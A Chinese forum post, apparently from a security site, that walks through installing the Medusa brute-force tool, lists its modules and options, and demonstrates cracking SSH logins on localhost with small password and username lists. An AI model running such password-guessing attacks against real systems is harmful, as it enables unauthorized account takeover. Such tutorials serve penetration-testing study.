切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
183 暴力破解 Medusa 1[复制链接]
发表于 2012-10-2 16:13:11 | 显示全部楼层 |!read_mode!

几乎支持全部协议破解

安装
  1. root@Dis9Team:/# apt-get install libssh2-1 libssh2-1-dev  openssh-server #支持SSH破解
  2. root@Dis9Team:/# apt-get install ncpfs  # 支持NCPFS 破解
  3. root@Dis9Team:/# apt-get install ncpfs  # 支持postgreSQL 破解
  4. root@Dis9Team:/# apt-get install libgcrypt11-dev libreadline6-dev libfuse-dev #其他
复制代码
下载源代码:
  1. root@Dis9Team:/tmp# wget http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
复制代码
编译安装
  1. root@Dis9Team:/tmp# tar xf medusa-2.1.1.tar.gz
  2. root@Dis9Team:/tmp# cd medusa-2.1.1
  3. root@Dis9Team:/tmp/medusa-2.1.1# ./configure --prefix=/pen/passswd/medusa
  4. root@Dis9Team:/tmp/medusa-2.1.1# make
  5. root@Dis9Team:/tmp/medusa-2.1.1# make install
  6. root@Dis9Team:/tmp# cd /pen/passswd/medusa/bin/
  7. root@Dis9Team:/pen/passswd/medusa/bin# ./medusa
  8. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  9. ALERT: Host information must be supplied.

  10. Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
  11.   -h [TEXT]    : Target hostname or IP address
  12.   -H [FILE]    : File containing target hostnames or IP addresses
  13.   -u [TEXT]    : Username to test
  14.   -U [FILE]    : File containing usernames to test
  15.   -p [TEXT]    : Password to test
  16.   -P [FILE]    : File containing passwords to test
  17.   -C [FILE]    : File containing combo entries. See README for more information.
  18.   -O [FILE]    : File to append log information to
  19.   -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
  20.   -M [TEXT]    : Name of the module to execute (without the .mod extension)
  21.   -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
  22.                  different parameter each time and they will all be sent to the module (i.e.
  23.                  -m Param1 -m Param2, etc.)
  24.   -d           : Dump all known modules
  25.   -n [NUM]     : Use for non-default TCP port number
  26.   -s           : Enable SSL
  27.   -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
  28.   -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
  29.   -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  30.   -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).
  31.   -t [NUM]     : Total number of logins to be tested concurrently
  32.   -T [NUM]     : Total number of hosts to be tested concurrently
  33.   -L           : Parallelize logins using one username per thread. The default is to process
  34.                  the entire username before proceeding.
  35.   -f           : Stop scanning host after first valid username/password found.
  36.   -F           : Stop audit after first valid username/password found on any host.
  37.   -b           : Suppress startup banner
  38.   -q           : Display module's usage information
  39.   -v [NUM]     : Verbose level [0 - 6 (more)]
  40.   -w [NUM]     : Error debug level [0 - 10 (more)]
  41.   -V           : Display version
  42.   -Z [TEXT]    : Resume scan based on map of previous scan
复制代码


创建快捷命令
  1. root@Dis9Team:/pen/passswd/medusa/bin# ln -s /pen/passswd/medusa/bin/medusa /usr/bin/medusa
复制代码


查看支持的模块
  1. root@Dis9Team:/pen/passswd/medusa/bin# medusa -d
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3.   Available modules in "." :

  4.   Available modules in "/pen/passswd/medusa/lib/medusa/modules" :
  5.     + cvs.mod : Brute force module for CVS sessions : version 2.0
  6.     + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
  7.     + http.mod : Brute force module for HTTP : version 2.0
  8.     + imap.mod : Brute force module for IMAP sessions : version 2.0
  9.     + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
  10.     + mysql.mod : Brute force module for MySQL sessions : version 2.0
  11.     + nntp.mod : Brute force module for NNTP sessions : version 2.0
  12.     + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
  13.     + pop3.mod : Brute force module for POP3 sessions : version 2.0
  14.     + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
  15.     + rexec.mod : Brute force module for REXEC sessions : version 2.0
  16.     + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
  17.     + rsh.mod : Brute force module for RSH sessions : version 2.0
  18.     + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
  19.     + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
  20.     + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
  21.     + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
  22.     + ssh.mod : Brute force module for SSH v2 sessions : version 2.0
  23.     + telnet.mod : Brute force module for telnet sessions : version 2.0
  24.     + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
  25.     + vnc.mod : Brute force module for VNC sessions : version 2.1
  26.     + web-form.mod : Brute force module for web forms : version 2.1
  27.     + wrapper.mod : Generic Wrapper Module : version 2.0


  28. root@Dis9Team:/pen/passswd/medusa/bin#
复制代码


查看模块信息
  1. root@Dis9Team:/pen/passswd/medusa/bin# medusa -M ssh -q
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. ssh.mod (2.0) JoMo-Kun <jmk@foofus.net> :: Brute force module for SSH v2 sessions

  4. Available module options:
  5.   BANNER:? (Libssh client banner. Default SSH-2.0-MEDUSA.)

  6. Usage example: "-M ssh -m BANNER:SSH-2.0-FOOBAR"
  7. root@Dis9Team:/pen/passswd/medusa/bin#
复制代码


演示破解一个SSH 自定义密码
  1. root@Dis9Team:~# echo "123456" > pass
  2. root@Dis9Team:~# echo "1234567" >> pass
  3. root@Dis9Team:~# echo "toor" >> pass
  4. root@Dis9Team:~# cat pass
  5. 123456
  6. 1234567
  7. toor
  8. root@Dis9Team:~#
复制代码


开始破解
  1. root@Dis9Team:~# medusa -h 127.0.0.1 -u root -P /root/pass -M ssh -n 22
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 3 complete)
  4. ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: 123456 [SUCCESS]
  5. root@Dis9Team:~#
复制代码


破解一个SSH 自定义账号密码
  1. root@Dis9Team:~# echo 1 > name
  2. root@Dis9Team:~# echo 12 >> name
  3. root@Dis9Team:~# echo root >> name
  4. root@Dis9Team:~# cat name
  5. 1
  6. 12
  7. root
  8. root@Dis9Team:~#
复制代码


开始
  1. root@Dis9Team:~# medusa -h 127.0.0.1 -U /root/name -P /root/pass -M ssh -n 22
  2. Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  3. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 1 (1 of 3, 0 complete) Password: 123456 (1 of 3 complete)
  4. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 1 (1 of 3, 0 complete) Password: 1234567 (2 of 3 complete)
  5. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 1 (1 of 3, 0 complete) Password: toor (3 of 3 complete)
  6. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 12 (2 of 3, 1 complete) Password: 123456 (1 of 3 complete)
  7. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 12 (2 of 3, 1 complete) Password: 1234567 (2 of 3 complete)
  8. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 12 (2 of 3, 1 complete) Password: toor (3 of 3 complete)
  9. ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (3 of 3, 2 complete) Password: 123456 (1 of 3 complete)
  10. ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: 123456 [SUCCESS]
  11. root@Dis9Team:~#
复制代码


ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: 123456 [SUCCESS]



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:38

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部